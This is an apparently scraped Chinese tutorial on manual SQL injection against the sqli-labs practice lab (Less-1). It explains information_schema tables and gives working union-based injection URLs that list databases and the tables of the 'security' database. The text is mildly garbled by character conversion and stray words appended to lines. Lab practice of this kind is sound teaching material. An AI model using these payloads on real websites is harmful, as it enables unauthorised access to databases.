sql手工注入1

手工注入常規思路

1.判斷是否存在注入,注入是字符型仍是數字型mysql

2.猜解 SQL 查詢語句中的字段數sql

3.肯定顯示的字段順序數據庫

4.獲取當前數據庫瀏覽器

5.獲取數據庫中的表函數

6.獲取表中的字段名編碼

7.查詢到帳戶的數據spa

 

information_schema數據庫表說明

SCHEMATA表:提供了當前mysql實例中全部數據庫的信息。是show databases的結果取之此表。3d

TABLES表:提供了關於數據庫中的表的信息(包括視圖)。詳細表述了某個表屬於哪一個schema,表類型,表引擎,建立時間等信息。是show tables from schemaname的結果取之此表。code

COLUMNS表:提供了表中的列信息。詳細表述了某張表的全部列以及每一個列的信息。是show columns from schemaname.tablename的結果取之此表。orm

STATISTICS表:提供了關於表索引的信息。是show index from schemaname.tablename的結果取之此表。

USER_PRIVILEGES(用戶權限)表:給出了關於全程權限的信息。該信息源自mysql.user受權表。是非標準表。

SCHEMA_PRIVILEGES(方案權限)表:給出了關於方案(數據庫)權限的信息。該信息來自mysql.db受權表。是非標準表。

TABLE_PRIVILEGES(表權限)表:給出了關於表權限的信息。該信息源自mysql.tables_priv受權表。是非標準表。

COLUMN_PRIVILEGES(列權限)表:給出了關於列權限的信息。該信息源自mysql.columns_priv受權表。是非標準表。

CHARACTER_SETS(字符集)表:提供了mysql實例可用字符集的信息。是SHOW CHARACTER SET結果集取之此表。

COLLATIONS表:提供了關於各字符集的對照信息。

COLLATION_CHARACTER_SET_APPLICABILITY表:指明瞭可用於校對的字符集。這些列等效於SHOW COLLATION的前兩個顯示字段。

TABLE_CONSTRAINTS表:描述了存在約束的表。以及表的約束類型。

KEY_COLUMN_USAGE表:描述了具備約束的鍵列。

ROUTINES表:提供了關於存儲子程序(存儲程序和函數)的信息。此時,ROUTINES表不包含自定義函數(UDF)。名爲「mysql.proc name」的列指明瞭對應於INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。

VIEWS表:給出了關於數據庫中的視圖的信息。須要有show views權限,不然沒法查看視圖信息。

TRIGGERS表:提供了關於觸發程序的信息。必須有super權限才能查看該表

 

MySQL GROUP_CONCAT()函數將組中的字符串鏈接成爲具備各類選項的單個字符串。

實驗192.168.8.172/sql/

Less-1

GET - Error based - Single quotes - String(基於錯誤的GET單引號字符型注入)

輸入id=1的正常頁面

 

 

 

 數據庫的註釋用-- (這裏有一個空格),可是在URL中最後加上-- ,瀏覽器會把發送請求末尾的空格去掉,全部咱們用--+代替-- ,由於+在URL被URL編碼後表示空格。

 

 

先嚐試爆破數據庫名,將ID改成一個數據庫不存在的值,使用union select1,2,3進行聯合查詢查看是否有顯示位。

 

 

頁面返回正常,所以該注入支持union聯合查詢注入。

查詢有那些數據庫

 

 http://127.0.0.1/sql/sqli-labs-master/Less-1/?id=qswz%27%20union%20select%201,(select%20group_concat(schema_name)from%20information_schema.schemata),3%20--+

命令解釋:

        schema_name 當前數據庫

        information_schema (數據詞典)是MySQL自帶的數據庫,提供了訪問數據庫元數據的方式(元數據是關於數據庫的數據,如數據庫名或表名,列的數據類型,或訪問權限等)

        schemata (information_schema中的一個表):提供了當前MySQL實例中全部數據庫的信息。

爆出了數據庫

咱們查詢一下security數據庫有那些表

 

 

http://127.0.0.1/sql/sqli-labs-master/Less-1/?id=qswz%27%20union%20select%201,(select%20group_concat(schema_name)from%20information_schema.schemata),(select group_concat(table_name)from  information_schema.tables where table_schema='security')%20--+

 

 

 

 這是手工注入的,用sqlmap的話能夠快速掃描出來的。

相關文章
相關標籤/搜索